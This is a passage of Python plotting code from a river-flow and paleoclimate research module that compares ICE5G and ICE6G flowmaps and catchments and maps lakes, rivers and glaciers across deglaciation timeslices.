                                                        flip_data=False,
                                                        rotate_data=True,
                                                        flip_ref=False,
                                                        rotate_ref=True,
                                                        lsmask_has_same_orientation_as_ref=False,
                                                        invert_ls_mask=True,
                                                        first_datasource_name="Present day",
                                                        second_datasource_name="LGM",
                                                        matching_parameter_set='extensive',
                                                        catchment_and_outflows_mods_list_filename=\
                                                        "ice6g_catch_and_outflow_mods_lgm_vs_present_day.txt",
                                                        additional_matches_list_filename=\
                                                        "ice6g_additional_matches_10min_upscaled_lgm_vs_present.txt",
                                                        use_single_color_for_discrepancies=True,
                                                        use_only_one_color_for_flowmap=False,
                                                        use_title=False,remove_antartica=True,
                                                        difference_in_catchment_label="Difference",
                                                        rivers_to_plot=[(216,433),(117,424),(112,380),(146,327),
                                                                        (132,496),(120,176),(251,638),(115,603),
                                                                        (33,571),(34,571),(36,660),(181,256),
                                                                        (120,457),(77,365),(258,235),(167,361),
                                                                        (219,598)],
                                                        rivers_to_plot_alt_color=[(237,393),(192,384),(169,371),
                                                                                  (119,399),(72,640),(126,165),
                                                                                  (87,112),(88,419),(160,237),
                                                                                  (60,35),(147,552),(245,635),
                                                                                  (86,460),(33,603),
                                                                                  (247,243),(41,682),(185,276),
                                                                                  (147,522),(244,612)],
                                                        rivers_to_plot_secondary_alt_color=[(230,427),(170,376),
                                                                                            (180,446),(143,327),
                                                                                            (201,287),(136,538),
                                                                                            (100,467),(116,130),
                                                                                            (160,572),(32,614),
                                                                                            (50,712),(210,619),
                                                                                            (179,445),(212,384),
                                                                                            (261,230),(85,438)],
                                                        glacier_mask_filename=glacier_mask_filename,
                                                        extra_lsmask_filename=extra_lsmask_filename,
                                                        glacier_mask_grid_type='LatLong10min',
                                                        flip_glacier_mask=True,
                                                        rotate_glacier_mask=True,
                                                        grid_type='HD')
def compare_ICE5G_and_ICE6G_with_catchments_tarasov_style_orog_corrs_for_both(self):
    """Compare ICE5G against ICE6G at the LGM, with tarasov style orography corrections applied to both.

    ICE5G (21k) is used as the reference and ICE6G (lgm) as the data set;
    filenames are assembled here and the plotting is delegated to
    FlowMapTwoColourComparisonWithCatchmentsHelper.
    """
    # Timestamps identifying the generation runs of the two data sets
    ice5g_datetime = "20170615_174943"
    ice6g_datetime = "20170612_202559"
    ref_filename=os.path.join(self.flow_maps_data_directory,
                              "flowmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_tarasov"
                              "_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
                              format(ice5g_datetime))
    data_filename=os.path.join(self.flow_maps_data_directory,
                               "flowmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
                               "tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                               format(ice6g_datetime))
    # Land-sea mask taken from the ICE6G LGM data set
    lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                 "ls_mask_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
                                 "_tarasov_orog_corrs_{0}_HD_transf.nc".\
                                 format(ice6g_datetime))
    ref_catchment_filename=("catchmentmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
                            "tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
                            format(ice5g_datetime))
    data_catchment_filename=("catchmentmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
                             "_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                             format(ice6g_datetime))
    ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
                        "plus_upscale_rdirs_tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_"
                        "updated.nc".format(ice5g_datetime))
    reference_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
                                                    "rmouthflows_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_"
                                                    "lsmask_plus_upscale_rdirs_tarasov_orog_corrs"
                                                    "_generation_and_upscaling_{0}_upscaled_updated.nc".\
                                                    format(ice5g_datetime))
    data_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
                                               "rmouthflows_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
                                               "plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                                               format(ice6g_datetime))
    #glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
    self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                        data_flowmap_filename=data_filename,
                                                        ref_catchment_filename=\
                                                        ref_catchment_filename,
                                                        data_catchment_filename=\
                                                        data_catchment_filename,
                                                        ref_rdirs_filename=\
                                                        ref_rdirs_filename,
                                                        data_rdirs_filename=None,
                                                        reference_rmouth_outflows_filename=\
                                                        reference_rmouth_outflows_filename,
                                                        data_rmouth_outflows_filename=\
                                                        data_rmouth_outflows_filename,
                                                        lsmask_filename=lsmask_filename,
                                                        minflowcutoff=100,
                                                        flip_data=False,
                                                        rotate_data=True,
                                                        flip_ref=False,
                                                        rotate_ref=True,
                                                        lsmask_has_same_orientation_as_ref=False,
                                                        flip_lsmask=False,rotate_lsmask=False,
                                                        invert_ls_mask=True,
                                                        first_datasource_name="ICE5G",
                                                        second_datasource_name="ICE6G",
                                                        matching_parameter_set='extensive',
                                                        catchment_and_outflows_mods_list_filename=\
                                                        "catch_and_outflow_mods_ice6g_vs_ice5g_lgm.txt",
                                                        #additional_matches_list_filename=\
                                                        #"additional_matches_ice6g_vs_ice5g_lgm.txt",
                                                        use_single_color_for_discrepancies=True,
                                                        use_only_one_color_for_flowmap=False,
                                                        use_title=False,remove_antartica=True,
                                                        difference_in_catchment_label="Difference",
                                                        rivers_to_plot=[(216,434),(116,426),(111,385),
                                                                        (127,473),(71,641),(123,175),
                                                                        (147,327),(146,554),(194,590),
                                                                        (25,605),(26,691),(69,31),
                                                                        (178,267),(88,455),(67,369),
                                                                        (253,637),(204,609),(270,238),
                                                                        (39,315),(42,252),
                                                                        (16,444),(56,232)],
                                                        rivers_to_plot_alt_color=[(193,383),(237,392),(170,369),
                                                                                  (118,398),(24,591),(114,612),
                                                                                  (126,167),(87,111),(88,246),
                                                                                  (160,240),(249,255),(91,421),
                                                                                  (197,626),(217,598),(135,496),
                                                                                  (31,112),(14,263),(54,2)],
                                                        rivers_to_plot_secondary_alt_color=[(230,428),(171,377),
                                                                                            (154,446),(100,467),
                                                                                            (142,327),(180,445),
                                                                                            (170,578),(117,131),
                                                                                            (24,622),(34,8),
                                                                                            (75,99),(201,287),
                                                                                            (90,433),(250,632),
                                                                                            (82,349),(138,536),
                                                                                            (29,392),(32,200),
                                                                                            (35,104),(261,246),
                                                                                            (14,320)],
                                                        grid_type='HD')
class OrographyPlots(Plots):
    """Shared base class for plots built from orography data.

    Extends Plots by locating the directory holding orography files
    beneath the main HD data path.
    """

    # Subdirectory of the HD data path containing orography files
    orography_path_extension = 'orographys'

    def __init__(self, save, color_palette_to_use='default'):
        """Initialise base plotting state and the orography data directory."""
        super(OrographyPlots, self).__init__(save, color_palette_to_use)
        self.orography_data_directory = os.path.join(self.hd_data_path,
                                                     self.orography_path_extension)
class SimpleOrographyPlots(OrographyPlots):
    """Simple orography array plots (largely a stub; main plotting is commented out)."""

    def __init__(self,save,color_palette_to_use='default'):
        """Class constructor."""
        super(SimpleOrographyPlots,self).__init__(save,color_palette_to_use)

    def SimpleArrayPlotHelper(self,filename):
        """Assists the creation of simple array plots"""
        # NOTE(review): 'filename' is currently unused and the contourf call
        # below is commented out, so plt.colorbar() has no mappable to draw
        # from and will raise at runtime - confirm whether this helper is
        # still needed or should be completed.
        #levels = np.linspace(-100.0, 9900.0, 100, endpoint=True)
        plt.figure()
        #plt.contourf(orography_field,levels)
        plt.colorbar()
        pts.invert_y_axis()
class Ice5GComparisonPlots(OrographyPlots):
    """Handles generation Ice5G data comparison plots"""

    def __init__(self,save,use_old_data=False,color_palette_to_use='default'):
        """Class constructor. Sets filename (to point to either old or new data)

        Arguments:
        save: passed through to the base class
        use_old_data: if True load the older 5-minute resolution data set,
            otherwise the newer 10-minute data from the ICE5G website
        color_palette_to_use: name of the colour palette to pass to the base class

        Loads the modern and LGM ICE-5G orography fields and stores their
        difference (LGM minus modern) for the plotting methods to use.
        """
        super(Ice5GComparisonPlots,self).__init__(save,color_palette_to_use)
        print("Comparing the Modern and LGM Ice-5G 5-minute resolution orography datasets")
        if use_old_data:
            #The data Uwe gave me; this is possibly an older version
            modern_ice_5g_filename = self.orography_data_directory +"/ice5g_0k_5min.nc"
            lgm_ice_5g_filename = self.orography_data_directory + "/ice5g_21k_5min.nc"
            modern_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(modern_ice_5g_filename, 'LatLong5min')
            lgm_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(lgm_ice_5g_filename, 'LatLong5min')
        else:
            #The latest version of the data from the ICE5G website
            modern_ice_5g_filename = self.orography_data_directory +"/ice5g_v1_2_00_0k_10min.nc"
            lgm_ice_5g_filename = self.orography_data_directory + "/ice5g_v1_2_21_0k_10min.nc"
            modern_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(modern_ice_5g_filename, 'LatLong10min')
            lgm_ice_5g_field = iohlpr.NetCDF4FileIOHelper.load_field(lgm_ice_5g_filename, 'LatLong10min')
        #Difference field used by all the plotting methods below
        self.difference_in_ice_5g_orography = lgm_ice_5g_field - modern_ice_5g_field
        if use_old_data:
            #Remove antartica
            self.difference_in_ice_5g_orography = self.difference_in_ice_5g_orography[275:,:]

    def plotLine(self):
        """Contour plot comparing the Modern and LGM Ice-5G 5-minute resolution orography datasets"""
        minc = 0
        maxc = 500
        num = 500
        levels = np.linspace(minc,maxc,num+1)
        title = textwrap.dedent("""\
        Orography difference between LGM and Modern ICE-5G data
        using {0} meter contour interval""").format((maxc-minc)/num)
        plt.figure()
        plt.contour(self.difference_in_ice_5g_orography,levels=levels)
        plt.title(title)
        pts.remove_ticks()
        #if self.save:
            #plt.savefig('something')
        print("Line contour plot created")

    def plotFilled(self):
        """Filled contour plot comparing the Modern and LGM Ice-5G 5-minute resolution orography datasets"""
        minc = 70
        maxc = 120
        num = 25
        levels = np.linspace(minc,maxc,num+1)
        title = "Orography difference between LGM and Modern ICE-5G data"
        plt.figure()
        plt.contourf(self.difference_in_ice_5g_orography,levels=levels)
        plt.title(title)
        pts.remove_ticks()
        cbar = plt.colorbar()
        cbar.ax.set_ylabel('Orography difference in meters')
        #if self.save:
            #plt.savefig('something')
        print("Filled contour plot created")

    def plotCombined(self):
        """Basic combined plot"""
        self.CombinedPlotHelper()

    def plotCombinedIncludingOceanFloors(self):
        """Combined plot with extended range of levels to include the ocean floor"""
        self.CombinedPlotHelper(minc=70,maxc=170,num=50)

    def CombinedPlotHelper(self,minc=70,maxc=120,num=25):
        """Combined filled and line contour plots of orography difference between LGM and Modern ICE-5G data

        Arguments:
        minc: lowest contour level (values below are hatched '/')
        maxc: highest contour level (values above are hatched '\\')
        num: number of contour intervals between minc and maxc
        """
        levels = np.linspace(minc,maxc,num+1)
        title = textwrap.dedent("""\
        Orography difference between LGM and Modern ICE-5G data
        using {0} meter contour interval""").format((maxc-minc)/num)
        plt.figure()
        ax = plt.subplot(111)
        #Note: the deprecated hold=True keyword (removed in Matplotlib 3.0)
        #has been dropped from the plotting calls below; successive pyplot
        #calls draw onto the current axes by default, so behaviour is unchanged.
        contourset = plt.contourf(self.difference_in_ice_5g_orography,
                                  levels=levels)
        cbar = plt.colorbar()
        cbar.ax.set_ylabel('Orography difference in meters')
        plt.contour(self.difference_in_ice_5g_orography,levels=contourset.levels,
                    colors='black')
        #Hatch the regions outside the contoured range so they appear in the legend
        ufcntr = plt.contourf(self.difference_in_ice_5g_orography,
                              levels=[np.min(self.difference_in_ice_5g_orography),minc],
                              colors='white',
                              hatches=['/'])
        ofcntr = plt.contourf(self.difference_in_ice_5g_orography,
                              levels=[maxc,np.max(self.difference_in_ice_5g_orography)],
                              colors='white',
                              hatches=['\\'])
        ufartists,uflabels = ufcntr.legend_elements() #@UnusedVariable
        ofartists,oflabels = ofcntr.legend_elements() #@UnusedVariable
        uflabels=['Difference $\\leq {0}$'.format(minc)]
        oflabels=['${0} <$ Difference'.format(maxc)]
        artists = ufartists + ofartists
        labels = uflabels + oflabels
        plt.title(title)
        pts.remove_ticks()
        axbounds = ax.get_position()
        #Shrink box by 5%
        ax.set_position([axbounds.x0,axbounds.y0 + axbounds.height*0.05,
                         axbounds.width,axbounds.height*0.95])
        ax.legend(artists,labels,loc='upper center',
                  bbox_to_anchor=(0.5,-0.025),fancybox=True,ncol=2)
        #if self.save:
            #plt.savefig('something')
        print("Combined plot created")
class LakePlots(Plots):
ls_masks_extension = 'lsmasks'
basin_catchment_nums_extension = "basin_catchment_numbers"
glacier_data_extension= 'orographys'
def __init__(self,save=False,color_palette_to_use='default'):
    """Class constructor.

    Arguments:
    save: passed through to the base class
    color_palette_to_use: name of the colour palette to pass to the base class

    Initialises the base Plots state and locates the data directories
    used by the lake plotting methods.
    """
    #Bug fix: the base-class constructor was previously never called, so the
    #'save' and 'color_palette_to_use' arguments were silently ignored; every
    #sibling Plots subclass forwards them to super().__init__.
    super(LakePlots,self).__init__(save,color_palette_to_use)
    self.ls_masks_data_directory= os.path.join(self.hd_data_path,
                                               self.ls_masks_extension)
    self.basin_catchment_nums_directory = os.path.join(self.hd_data_path,
                                                       self.basin_catchment_nums_extension)
    self.glacier_data_directory = os.path.join(self.hd_data_path,
                                               self.glacier_data_extension)
def plotLakeDepth(self,ax,timeslice):
    """Draw the potential lake depth field for one timeslice onto the given axes.

    Arguments:
    ax: the matplotlib axes to draw onto
    timeslice: integer key selecting which prepared-orography run to load

    Returns the contour set so the caller can attach a colourbar to it.
    """
    #Generation timestamp of the prepared orography for each timeslice key
    run_timestamps = {1850:"20190211_131542",
                      1800:"20190211_131517",
                      1750:"20190211_131429",
                      1700:"20190211_131345",
                      1650:"20190211_131301",
                      1600:"20190211_131212",
                      1550:"20190211_131126",
                      1500:"20190211_131041",
                      1450:"20190211_130957",
                      1400:"20190211_130918"}
    #Years before present corresponding to each timeslice key
    years_before_present = {1850:7500,
                            1800:8000,
                            1750:8500,
                            1700:9000,
                            1650:9500,
                            1600:10000,
                            1550:10500,
                            1500:11000,
                            1450:11500,
                            1400:12000}
    depth = iodriver.advanced_field_loader(
        filename="/Users/thomasriddick/Downloads/updated_orog_{}_lake_"
                 "basins_prepare_orography_{}.nc".format(timeslice,run_timestamps[timeslice]),
        time_slice=None,
        fieldname="depth",
        adjust_orientation=True)
    raw_mask = iohlpr.NetCDF4FileIOHelper.load_field(
        "/Users/thomasriddick/Documents/data/HDdata/lsmasks/10min_lsmask_pmu0178_merged.nc",
        grid_type='LatLong10min',
        timeslice=timeslice)
    land_sea_mask = field.Field(raw_mask,grid='LatLong10min')
    #Bring the mask and depth field into the same orientation before masking
    land_sea_mask.rotate_field_by_a_hundred_and_eighty_degrees()
    land_sea_mask.flip_data_ud()
    depth.flip_data_ud()
    masked_depth = np.ma.MaskedArray(data=depth.get_data(),
                                     mask=land_sea_mask.get_data())
    ax.set_title("{} BP".format(years_before_present[timeslice]))
    #Plot only the region of interest via fixed index slicing
    contour_set = ax.contourf(masked_depth[800:-170,450:650],
                              levels=np.linspace(0,700,25),
                              cmap="Blues")
    ax.set_xticks(np.array([90]))
    ax.set_xticklabels(["90$^{\circ}$ E"])
    ax.set_yticks(np.array([10]))
    ax.set_yticklabels(["45$^{\circ}$ N"])
    return contour_set
def plotLakeDepths(self):
    """Plot a two-by-two panel of potential lake depths for four timeslices
    with a single shared horizontal colourbar beneath them."""
    fig = plt.figure(figsize=(18, 6))
    #Third (short) row holds the shared colourbar
    gs = gridspec.GridSpec(3, 2,height_ratios=[4,4, 1])
    ax1 = plt.subplot(gs[0, 0])
    ax2 = plt.subplot(gs[0, 1])
    ax3 = plt.subplot(gs[1, 0])
    ax4 = plt.subplot(gs[1, 1])
    ax_cb = plt.subplot(gs[2, :])
    self.plotLakeDepth(ax1,1450)
    self.plotLakeDepth(ax2,1550)
    self.plotLakeDepth(ax3,1650)
    #All panels share the same contour levels, so one colourbar suffices
    cs = self.plotLakeDepth(ax4,1750)
    fig.colorbar(cs,cax=ax_cb,orientation="horizontal")
    #Bug fix: the label was previously set on an undefined name 'adddaf_cb',
    #which raised a NameError; the colourbar axes is ax_cb.
    ax_cb.set_xlabel("Potential Lake Depth (m)")
    fig.tight_layout()
def TwoColourRiverAndLakePlotHelper(self,river_flow_filename,
                                    lsmask_filename,
                                    basin_catchment_num_filename,
                                    lake_data_filename,
                                    glacier_data_filename,
                                    flip_river_data=False,
                                    flip_mask=False,
                                    flip_catchment_nums=False,
                                    flip_lake_data=False,
                                    flip_glacier_mask=False,
                                    rotate_lsmask=False,
                                    rotate_catchment_nums=False,
                                    rotate_lake_data=False,
                                    rotate_glacier_mask=False,
                                    minflowcutoff=1000000000000.0,
                                    lake_grid_type='LatLong10min',
                                    lake_kwargs={},
                                    river_grid_type='HD',**river_kwargs):
    """Help produce a map of river flow, lakes and potential lakes

    Arguments:
    river_flow_filename: file holding the (coarse grid) cumulative river flow field
    lsmask_filename: file holding the (fine grid) land-sea mask
    basin_catchment_num_filename: file holding the basin catchment numbers
        (cells > 0 mark potential lake basins)
    lake_data_filename: file holding the lake data (cells > 0 mark lakes)
    glacier_data_filename: file holding the glacier mask (field "ICEM")
    flip_*/rotate_*: orientation corrections applied to the individual fields
    minflowcutoff: threshold above which a cell is drawn as a river
    lake_grid_type/lake_kwargs: grid specification for the fine (lake) fields
    river_grid_type/river_kwargs: grid specification for the coarse (river) field

    NOTE(review): lake_kwargs uses a mutable default argument; it is only
    ever passed through (never mutated) here, so this is currently harmless.
    """
    river_flow_object = iodriver.load_field(river_flow_filename,
                                            file_type=iodriver.\
                                            get_file_extension(river_flow_filename),
                                            field_type='Generic',
                                            grid_type=river_grid_type,**river_kwargs)
    lsmask_field = iodriver.load_field(lsmask_filename,
                                       file_type=iodriver.get_file_extension(lsmask_filename),
                                       field_type='Generic',grid_type=lake_grid_type,
                                       **lake_kwargs)
    basin_catchment_nums_field = iodriver.load_field(basin_catchment_num_filename,
                                                     file_type=iodriver.\
                                                     get_file_extension\
                                                     (basin_catchment_num_filename),
                                                     field_type='Generic',
                                                     grid_type=lake_grid_type,
                                                     **lake_kwargs)
    lake_data_field = iodriver.load_field(lake_data_filename,
                                          file_type=iodriver.\
                                          get_file_extension(lake_data_filename),
                                          field_type='Generic',
                                          grid_type=lake_grid_type,
                                          **lake_kwargs)
    glacier_mask_field = iodriver.load_field(glacier_data_filename,
                                             file_type=iodriver.\
                                             get_file_extension(glacier_data_filename),
                                             fieldname="ICEM",
                                             field_type='Generic',
                                             grid_type=lake_grid_type,
                                             **lake_kwargs)
    #Apply the requested per-field orientation corrections
    if flip_river_data:
        river_flow_object.flip_data_ud()
    if flip_mask:
        lsmask_field.flip_data_ud()
    if flip_catchment_nums:
        basin_catchment_nums_field.flip_data_ud()
    if flip_lake_data:
        lake_data_field.flip_data_ud()
    if flip_glacier_mask:
        glacier_mask_field.flip_data_ud()
    if rotate_catchment_nums:
        basin_catchment_nums_field.rotate_field_by_a_hundred_and_eighty_degrees()
    if rotate_lake_data:
        lake_data_field.rotate_field_by_a_hundred_and_eighty_degrees()
    if rotate_lsmask:
        lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
    if rotate_glacier_mask:
        glacier_mask_field.rotate_field_by_a_hundred_and_eighty_degrees()
    lsmask = lsmask_field.get_data()
    basin_catchment_nums = basin_catchment_nums_field.get_data()
    river_flow = river_flow_object.get_data()
    rivers_and_lakes_field = copy.deepcopy(river_flow_object)
    rivers_and_lakes = rivers_and_lakes_field.get_data()
    lake_data = lake_data_field.get_data()
    glacier_mask = glacier_mask_field.get_data()
    plt.figure()
    plt.subplot(111)
    #Build a categorical field: 1 = land, 2 = river (flow >= cutoff)
    rivers_and_lakes[river_flow < minflowcutoff] = 1
    rivers_and_lakes[river_flow >= minflowcutoff] = 2
    #Downscale the categorical river field to the fine lake grid
    fine_rivers_and_lakes_field = utilities.downscale_ls_mask(rivers_and_lakes_field,
                                                              lake_grid_type,
                                                              **lake_kwargs)
    fine_rivers_and_lakes = fine_rivers_and_lakes_field.get_data()
    #Overlay further categories (later assignments take precedence):
    #3 = potential lake basin, 4 = lake, 5 = glacier, 0 = ocean
    fine_rivers_and_lakes[basin_catchment_nums > 0 ] = 3
    fine_rivers_and_lakes[lake_data > 0] = 4
    fine_rivers_and_lakes[glacier_mask == 1] = 5
    fine_rivers_and_lakes[lsmask == 1] = 0
    #Colour per category: 0 ocean=blue, 1 land=peru, 2 river=black,
    #3 potential basin=green, 4 lake=red, 5 glacier=white
    cmap = mpl.colors.ListedColormap(['blue','peru','black','green','red','white'])
    bounds = list(range(7))
    norm = mpl.colors.BoundaryNorm(bounds,cmap.N)
    plt.imshow(fine_rivers_and_lakes,cmap=cmap,norm=norm,interpolation="none")
    plt.title('Cells with cumulative flow greater than or equal to {0}'.format(minflowcutoff))
def TwoColourRiverAndLakeAnimationHelper(self,
                                         river_flow_file_basename,
                                         lsmask_file_basename,
                                         basin_catchment_num_file_basename,
                                         lake_data_file_basename,
                                         glacier_data_file_basename,
                                         river_flow_fieldname,
                                         lsmask_fieldname,
                                         basin_catchment_num_fieldname,
                                         lake_data_fieldname,
                                         glacier_fieldname,
                                         catchment_nums_file_basename=None,
                                         catchment_nums_fieldname=None,
                                         rdirs_file_basename=None,
                                         rdirs_fieldname=None,
                                         minflowcutoff=1000000000000.0,
                                         zoomed=False,
                                         zoom_section_bounds={}):
    """Help produce a map of river flow, lakes and potential lakes

    Builds an animation over timeslices from 15990 to 11010 years BP in
    10-year steps. Each file basename contains the literal token "DATETIME"
    which is substituted per frame with either the timeslice year or the
    corresponding MPI-ESM model year. The per-frame image generation is
    delegated to TwoColourRiverAndLakeAnimationHelperSliceGenerator.

    Arguments:
    *_file_basename: filename templates containing the "DATETIME" token
    *_fieldname: field names to read from the respective files
    catchment_nums_*/rdirs_*: optional extra inputs (None to omit)
    minflowcutoff: flow threshold above which a cell is drawn as a river
    zoomed/zoom_section_bounds: optional zoom window passed to the slice generator
    """
    fig = plt.figure()
    plt.subplot(111)
    cmap = mpl.colors.ListedColormap(['darkblue','peru','black','cyan','blue','white','purple','darkred','slategray'])
    bounds = list(range(10))
    norm = mpl.colors.BoundaryNorm(bounds,cmap.N)
    plt.title('Lakes and rivers with flow greater than {0} m3/s'.format(minflowcutoff))
    ims = []
    #Timeslices at which to additionally show a static snapshot
    #show_slices = [14600,13500,12800,12330,11500,11300]
    show_slices = [15990]
    for time in range(15990,11000,-10):
        #Conversion from years BP to the MPI-ESM run's model year
        mpiesm_time = 3000 + 16000 - time
        show_snapshot = True if time in show_slices else False
        date_text = fig.text(0.4,0.075,"{} YBP".format(time))
        #Note: river flow and lake data are indexed by model year, the other
        #inputs by years BP
        ims.append([self.TwoColourRiverAndLakeAnimationHelperSliceGenerator(cmap=cmap,norm=norm,
                                                                            river_flow_filename=
                                                                            river_flow_file_basename.replace("DATETIME",str(mpiesm_time)),
                                                                            lsmask_filename=
                                                                            lsmask_file_basename.replace("DATETIME",str(time)),
                                                                            basin_catchment_num_filename=
                                                                            basin_catchment_num_file_basename.replace("DATETIME",str(time)),
                                                                            lake_data_filename=
                                                                            lake_data_file_basename.replace("DATETIME",str(mpiesm_time)),
                                                                            glacier_data_filename=
                                                                            glacier_data_file_basename.replace("DATETIME",str(time)),
                                                                            river_flow_fieldname=river_flow_fieldname,
                                                                            lsmask_fieldname=lsmask_fieldname,
                                                                            basin_catchment_num_fieldname=
                                                                            basin_catchment_num_fieldname,
                                                                            lake_data_fieldname=
                                                                            lake_data_fieldname,
                                                                            glacier_fieldname=
                                                                            glacier_fieldname,
                                                                            catchment_nums_filename=
                                                                            catchment_nums_file_basename.replace("DATETIME",str(time)) if
                                                                            catchment_nums_file_basename is not None else None,
                                                                            catchment_nums_fieldname=
                                                                            catchment_nums_fieldname,
                                                                            rdirs_filename=
                                                                            rdirs_file_basename.replace("DATETIME",str(time)) if
                                                                            rdirs_file_basename is not None else None,
                                                                            rdirs_fieldname=
                                                                            rdirs_fieldname,
                                                                            minflowcutoff=minflowcutoff,
                                                                            zoomed=zoomed,
                                                                            zoom_section_bounds=
                                                                            zoom_section_bounds,
                                                                            show_snapshot=show_snapshot),
                    date_text])
    anim = animation.ArtistAnimation(fig,ims,interval=200,blit=False,repeat_delay=500)
    plt.show()
    #writer = animation.writers['ffmpeg'](fps=7,bitrate=1800)
    #anim.save('/Users/thomasriddick/Desktop/deglac.mp4',writer=writer,dpi=1000)
def TwoColourRiverAndLakeAnimationHelperSliceGenerator(self,cmap,norm,
river_flow_filename,
lsmask_filename,
basin_catchment_num_filename,
lake_data_filename,
glacier_data_filename,
river_flow_fieldname,
lsmask_fieldname,
basin_catchment_num_fieldname,
lake_data_fieldname,
glacier_fieldname,
catchment_nums_filename=None,
catchment_nums_fieldname=None,
rdirs_filename=None,
rdirs_fieldname=None,
minflowcutoff=1000000000000.0,
zoomed=False,
zoom_section_bounds={},
show_snapshot=False):
"""Build one frame of the river-and-lake animation.

Loads the fields for a single time slice, classifies every fine-grid cell
into an integer colour code (rendered via the supplied cmap/norm) and
returns the matplotlib image object for use in an ArtistAnimation.

Colour codes written into the plotted field: 1 = ordinary land,
2 = river cell (flow >= minflowcutoff), 3 = filling lake basin cell,
4 = lake, 5 = glacier, 0 = ocean; 6-8 mark land draining to the three
ocean-basin catchment areas (only when both rdirs_filename and
catchment_nums_filename are supplied).

NOTE(review): zoom_section_bounds uses a mutable default ({}); it is only
read here, never mutated, so this is currently harmless but fragile.
"""
# time_slice=5 selects a fixed slice within the multi-slice river/lake
# output files -- presumably the wanted year within each file; TODO confirm.
river_flow_object = iodriver.advanced_field_loader(river_flow_filename,
fieldname=river_flow_fieldname,
field_type='Generic',
time_slice=5)
lsmask_field = iodriver.advanced_field_loader(lsmask_filename,
fieldname=lsmask_fieldname,
field_type='Generic')
basin_catchment_nums_field = iodriver.advanced_field_loader(basin_catchment_num_filename,
fieldname=basin_catchment_num_fieldname,
field_type='Generic')
lake_data_field = iodriver.advanced_field_loader(lake_data_filename,
fieldname=lake_data_fieldname,
field_type='Generic',
time_slice=5)
glacier_mask_field = iodriver.advanced_field_loader(glacier_data_filename,
fieldname=glacier_fieldname,
field_type='Generic')
# Optional inputs, needed only for the ocean-basin catchment colouring below.
if catchment_nums_filename is not None:
catchment_nums_field = iodriver.advanced_field_loader(catchment_nums_filename,
fieldname=catchment_nums_fieldname,
field_type='Generic')
if rdirs_filename is not None:
rdirs_field = iodriver.advanced_field_loader(rdirs_filename,
fieldname=rdirs_fieldname,
field_type='Generic')
lsmask = lsmask_field.get_data()
basin_catchment_nums = basin_catchment_nums_field.get_data()
river_flow = river_flow_object.get_data()
# Work on a deep copy so the raw flow values remain intact for thresholding.
rivers_and_lakes_field = copy.deepcopy(river_flow_object)
rivers_and_lakes = rivers_and_lakes_field.get_data()
lake_data = lake_data_field.get_data()
glacier_mask = glacier_mask_field.get_data()
# Binary classification on the coarse grid: 1 = land, 2 = river.
rivers_and_lakes[river_flow < minflowcutoff] = 1
rivers_and_lakes[river_flow >= minflowcutoff] = 2
# Downscale the coarse classification to the 10-minute grid for plotting.
fine_rivers_and_lakes_field = utilities.downscale_ls_mask(rivers_and_lakes_field,
"LatLong10min")
fine_rivers_and_lakes = fine_rivers_and_lakes_field.get_data()
if (rdirs_filename is not None) and (catchment_nums_filename is not None):
# Hard-coded index boxes delimiting three ocean drainage regions
# (grid indices, not degrees -- TODO confirm which oceans these are).
ocean_basin_catchments = pts.find_ocean_basin_catchments(rdirs_field,catchment_nums_field,areas=[{'min_lat':70,
'max_lat':115,
'min_lon':195,
'max_lon':265},
{'min_lat':110,
'max_lat':135,
'min_lon':162,
'max_lon':196},
{'min_lat':15,
'max_lat':50,
'min_lon':0,
'max_lon':175}])
fine_ocean_basin_catchments_field = utilities.downscale_ls_mask(ocean_basin_catchments,
"LatLong10min")
fine_ocean_basin_catchments= fine_ocean_basin_catchments_field.get_data()
# Recolour plain land (code 1) according to which ocean basin it drains to.
fine_rivers_and_lakes[np.logical_and(fine_rivers_and_lakes == 1,
fine_ocean_basin_catchments == 1)] = 6
fine_rivers_and_lakes[np.logical_and(fine_rivers_and_lakes == 1,
fine_ocean_basin_catchments == 2)] = 7
fine_rivers_and_lakes[np.logical_and(fine_rivers_and_lakes == 1,
fine_ocean_basin_catchments == 3)] = 8
# Overlay order matters: later assignments win where categories overlap
# (basins < lakes < glacier < ocean).  These mask arrays are assumed to
# already be on the 10-minute grid -- TODO confirm.
fine_rivers_and_lakes[basin_catchment_nums > 0 ] = 3
fine_rivers_and_lakes[lake_data > 0] = 4
fine_rivers_and_lakes[glacier_mask == 1] = 5
fine_rivers_and_lakes[lsmask == 1] = 0
# Snapshot frames are drawn on a freshly cleared figure and shown directly.
if show_snapshot:
plt.clf()
if zoomed:
im = plt.imshow(fine_rivers_and_lakes[zoom_section_bounds["min_lat"]:
zoom_section_bounds["max_lat"]+1,
zoom_section_bounds["min_lon"]:
zoom_section_bounds["max_lon"]+1],
cmap=cmap,norm=norm,interpolation="none")
else:
im = plt.imshow(fine_rivers_and_lakes,cmap=cmap,norm=norm,interpolation="none")
if show_snapshot:
plt.show()
return im
def LakeAndRiverMap(self):
